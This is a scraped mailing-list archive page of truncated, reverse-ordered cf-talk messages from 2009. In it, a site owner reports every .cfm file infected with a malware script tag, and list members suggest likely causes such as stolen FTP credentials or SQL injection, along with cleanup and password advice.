On Tuesday 15 Sep 2009, Jacob wrote:
> Format C: - Reinstall apps - restore data from backup.
Although probably OK in this case, note that malware could be hiding in the
BIOS, Intel vPro etc. etc., especially if you have been target specifically.
--
Helping to efficiently establish market-driv
It happened to a Linux site that I maintain that runs Apache... Here's
how it happened:
Another user had the FTP credentials in Front Page (but I suspect it
could have been any "standard" Windows FTP program) and they visited a
malware site, got a virus on their machine and it found the ability
F
Can you give us some of the text that was added to each file? And
was it added to the same spot in each file (like top or bottom?) I
have a monitor that checks my website every 5 minutes for changes to
the database.. I should probably add a function to compare the text
on the page and tell m
On Tue, Sep 15, 2009 at 5:31 PM, Jacob wrote:
>
> Format C: - Reinstall apps - restore data from backup.
>
> "Backup? Hmm..." ;-)
>
>
I saw this once before it only targeted index.cfm files and was due to a
employees computer being compromized and did same thign as what is happening
here. This
Format C: - Reinstall apps - restore data from backup.
"Backup? Hmm..." ;-)
-Original Message-
From: Cameron Childress [mailto:camer...@gmail.com]
Sent: Tuesday, September 15, 2009 2:06 PM
To: cf-talk
Subject: Re: HoF invaded
On Tue, Sep 15, 2009 at 1:00 PM, Michael Dinow
On Tue, Sep 15, 2009 at 1:00 PM, Michael Dinowitz
wrote:
> My own machine. If it was FTP then there would be logs.
Never assume your logs are accurate on a compromised machine.
Sorry to hear this happened - good luck with the cleanup...
-Cameron
~~~
If the MS ftp was enabled then maybe but it's not. Unless it is and it
is hidden for some reason.
On Tue, Sep 15, 2009 at 2:41 PM, Ian Skinner wrote:
>
> Michael Dinowitz wrote:
>> Somehow, every .cfm file on the HoF site has been infected with a
>> malware script tag. I'm cleaning it out now bu
Michael Dinowitz wrote:
> Somehow, every .cfm file on the HoF site has been infected with a
> malware script tag. I'm cleaning it out now but it's a bit worrysome
> as to how it got on. I'll have an update as soon as I run a cleaner
> regex against the whole site.
>
>
This does sound like a cur
Nope. I have very strong protection against that on multiple levels.
And again, if that was the case it would effect more than just public
facing cfm files.
> I suspect you have a query vulnerable to SQL injection.
>
> Paul
~|
W
While this is possible via xp_cmdshell (MS SQL Server), it is unlikely
since the majority of SQLi attacks affect your data and MD stated that
the actual .cfm files themselves had the text inserted.
~Brad
Original Message
Subject: RE: HoF invaded
From: "Paul Vernon&q
>> Each and every .cfm file that is on a site that is mapped to iis was
>> affected. If a .cfm was in a non-mapped directory then it was not
>> touched. This says to me that the hole is in iis.
>
> I suspect you have a query vulnerable to SQL injection.
If the attack actually caused the malware s
> Each and every .cfm file that is on a site that is mapped to iis was
> affected. If a .cfm was in a non-mapped directory then it was not
> touched. This says to me that the hole is in iis.
Unless you're running a very old version of IIS, this is highly
unlikely. You almost certainly have some s
> Each and every .cfm file that is on a site that is mapped to iis was
> affected. If a .cfm was in a non-mapped directory then it was not
> touched. This says to me that the hole is in iis.
>
I suspect you have a query vulnerable to SQL injection.
Paul
~~
Sorry to hear about the problems on HoF. Thanks for letting us know.
I was about to post a message about HoF being flagged as a possible malware
site in google. But I see you discovered the problem already.
~|
Wa
iginal Message-
>> From: b...@bradwood.com [mailto:b...@bradwood.com]
>> Sent: Tuesday, September 15, 2009 11:54 AM
>> To: cf-talk
>> Subject: RE: HoF invaded
>>
>>
>> Ouch. Are you on shared hosting?
>>
>> I would change every FTP passwor
Tuesday, September 15, 2009 11:54 AM
> To: cf-talk
> Subject: RE: HoF invaded
>
>
> Ouch. Are you on shared hosting?
>
> I would change every FTP password stat.
>
> Good Luck.
>
> ~Brad
>
> Original Message
> Subject: HoF invaded
Sent: Tuesday, September 15, 2009 11:54 AM
To: cf-talk
Subject: RE: HoF invaded
Ouch. Are you on shared hosting?
I would change every FTP password stat.
Good Luck.
~Brad
Original Message
Subject: HoF invaded
From: Michael Dinowitz
Date: Tue, September 15, 2009 11:46 am
T
and I'm in the city so it's easier
just to bring it down, fix it, and send it back up. It'll be done
soon.
On Tue, Sep 15, 2009 at 12:54 PM, wrote:
>
> Ouch. Are you on shared hosting?
>
> I would change every FTP password stat.
>
> Good Luck.
>
> ~Brad
Ouch. Are you on shared hosting?
I would change every FTP password stat.
Good Luck.
~Brad
Original Message
Subject: HoF invaded
From: Michael Dinowitz
Date: Tue, September 15, 2009 11:46 am
To: cf-talk
Somehow, every .cfm file on the HoF site has been infected
Somehow, every .cfm file on the HoF site has been infected with a
malware script tag. I'm cleaning it out now but it's a bit worrysome
as to how it got on. I'll have an update as soon as I run a cleaner
regex against the whole site.
--
Michael Dinowitz (http://www.linkedin.com/in/mdinowitz)
Pres
20 matches
Mail list logo